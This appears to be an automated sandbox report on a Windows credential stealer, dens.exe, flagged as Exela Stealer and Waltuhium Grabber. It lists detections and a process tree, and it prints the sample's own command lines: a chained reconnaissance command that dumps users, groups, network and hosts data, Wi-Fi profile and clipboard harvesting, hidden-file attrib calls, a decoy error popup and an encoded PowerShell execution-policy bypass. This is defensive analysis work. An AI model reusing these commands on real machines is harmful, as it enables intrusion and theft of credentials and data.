Windows Analysis Report
dens.exe

Overview

General Information

Sample name: dens.exe
Analysis ID: 1554825
MD5: 258322c37f4f5c632bd6c79520899603
SHA1: f7971d8fef96c59df97a2b31436cc0c1f8921182
SHA256: 09b67ccd7d38d2f868eb2a67c73e2e8d45aefe1054522477b259c399527b2c39
Infos:

Detection

Python Stealer, Exela Stealer, Waltuhium Grabber
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Exela Stealer
Yara detected Python Stealer
Yara detected Waltuhium Grabber
AI detected suspicious sample
Bypasses PowerShell execution policy
Detected generic credential text file
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Gathers network related connection and port information
Modifies existing user documents (likely ransomware behavior)
Modifies the windows firewall
Overwrites the password of the administrator account
Performs a network lookup / discovery via ARP
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses netstat to query active network connections and open ports
Yara detected Generic Python Stealer
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer

Classification

  • System is w10x64
  • dens.exe (PID: 6248 cmdline: "C:\Users\user\Desktop\dens.exe" MD5: 258322C37F4F5C632BD6C79520899603)
    • dens.exe (PID: 6500 cmdline: "C:\Users\user\Desktop\dens.exe" MD5: 258322C37F4F5C632BD6C79520899603)
      • cmd.exe (PID: 5932 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 980 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 1136 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3020 cmdline: wmic computersystem get Manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 2044 cmdline: C:\Windows\system32\cmd.exe /c "gdb --version" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5344 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2908 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 6904 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 732 cmdline: C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6432 cmdline: wmic path Win32_ComputerSystem get Manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 3624 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 4632 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 6392 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 1732 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 1344 cmdline: C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • attrib.exe (PID: 6484 cmdline: attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
      • cmd.exe (PID: 6560 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 2812 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 1748 cmdline: C:\Windows\system32\cmd.exe /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 4460 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 6544 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 4364 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 352 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 3624 cmdline: C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 3104 cmdline: cmd.exe /c chcp MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • chcp.com (PID: 2692 cmdline: chcp MD5: 33395C4732A49065EA72590B14B64F32)
      • cmd.exe (PID: 4504 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 4284 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 1352 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1900 cmdline: powershell.exe Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 3488 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profiles" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 6392 cmdline: netsh wlan show profiles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 3652 cmdline: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 2128 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • WmiPrvSE.exe (PID: 7172 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • HOSTNAME.EXE (PID: 7380 cmdline: hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0)
        • WMIC.exe (PID: 7400 cmdline: wmic logicaldisk get caption,description,providername MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • net.exe (PID: 7456 cmdline: net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7472 cmdline: C:\Windows\system32\net1 user MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • query.exe (PID: 7488 cmdline: query user MD5: 29043BC0B0F99EAFF36CAD35CBEE8D45)
          • quser.exe (PID: 7504 cmdline: "C:\Windows\system32\quser.exe" MD5: 480868AEBA9C04CA04D641D5ED29937B)
        • net.exe (PID: 7536 cmdline: net localgroup MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7560 cmdline: C:\Windows\system32\net1 localgroup MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 7588 cmdline: net localgroup administrators MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7608 cmdline: C:\Windows\system32\net1 localgroup administrators MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 7628 cmdline: net user guest MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7640 cmdline: C:\Windows\system32\net1 user guest MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • net.exe (PID: 7668 cmdline: net user administrator MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
          • net1.exe (PID: 7680 cmdline: C:\Windows\system32\net1 user administrator MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9)
        • WMIC.exe (PID: 7700 cmdline: wmic startup get caption,command MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • tasklist.exe (PID: 7760 cmdline: tasklist /svc MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • ipconfig.exe (PID: 7844 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
        • ROUTE.EXE (PID: 7868 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
        • ARP.EXE (PID: 7884 cmdline: arp -a MD5: 2AF1B2C042B83437A4BE82B19749FA98)
        • NETSTAT.EXE (PID: 7900 cmdline: netstat -ano MD5: 7FDDD6681EA81CE26E64452336F479E6)
        • sc.exe (PID: 7916 cmdline: sc query type= service state= all MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • netsh.exe (PID: 7940 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
        • netsh.exe (PID: 7968 cmdline: netsh firewall show config MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 8040 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8088 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8128 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8184 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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 MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 7256 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_WaltuhiumGrabber | Yara detected Waltuhium Grabber | Joe Security |
00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_ExelaStealer | Yara detected Exela Stealer | Joe Security |
00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_GenericPythonStealer | Yara detected Generic Python Stealer | Joe Security |
00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_WaltuhiumGrabber | Yara detected Waltuhium Grabber | Joe Security |
00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PythonStealer | Yara detected Python Stealer | Joe Security |

System Summary

            Source: Process startedAuthor: Diego Perez (@darkquassar), Markus Neis, Swisscom (Improve Rule): Data: Command: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", CommandLine: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6560, ParentProcessName: cmd.exe, ProcessCommandLine: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()", ProcessId: 2812, ProcessName: mshta.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [Base64-encoded payload omitted]
            Source: Process startedAuthor: _pete_0, TheDFIRReport: Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: cmd.exe /c chcp, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4364, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 352, ProcessName: chcp.com
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\dens.exe", ParentImage: C:\Users\user\Desktop\dens.exe, ParentProcessId: 6500, ParentProcessName: dens.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ProcessId: 1352, ProcessName: cmd.exe
            Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
            Source: Process startedAuthor: Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems): Data: Command: net localgroup administrators, CommandLine: net localgroup administrators, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3652, ParentProcessName: cmd.exe, ProcessCommandLine: net localgroup administrators, ProcessId: 7588, ProcessName: net.exe
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8184, TargetFilename: C:\Users\user\AppData\Local\Temp\mugnbzbx\mugnbzbx.cmdline
            Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3652, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 7456, ProcessName: net.exe
            Source: Process startedAuthor: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3652, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 7456, ProcessName: net.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe Get-Clipboard, CommandLine: powershell.exe Get-Clipboard, CommandLine|base64offset|contains: ~Xn, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1352, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe Get-Clipboard, ProcessId: 1900, ProcessName: powershell.exe
            Source: Process started, Author: frack113, Data: Command: sc query type= service state= all, CommandLine: sc query type= service state= all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3652, ParentProcessName: cmd.exe, ProcessCommandLine: sc query type= service state= all, ProcessId: 7916, ProcessName: sc.exe
            Source: Process started, Author: frack113, Data: Command: hostname, CommandLine: hostname, CommandLine|base64offset|contains: -, Image: C:\Windows\System32\HOSTNAME.EXE, NewProcessName: C:\Windows\System32\HOSTNAME.EXE, OriginalFileName: C:\Windows\System32\HOSTNAME.EXE, ParentCommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3652, ParentProcessName: cmd.exe, ProcessCommandLine: hostname, ProcessId: 7380, ProcessName: HOSTNAME.EXE
            Source: Process started, Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Data: Command: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine: C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config", CommandLine|base64offset|contains: , Image: 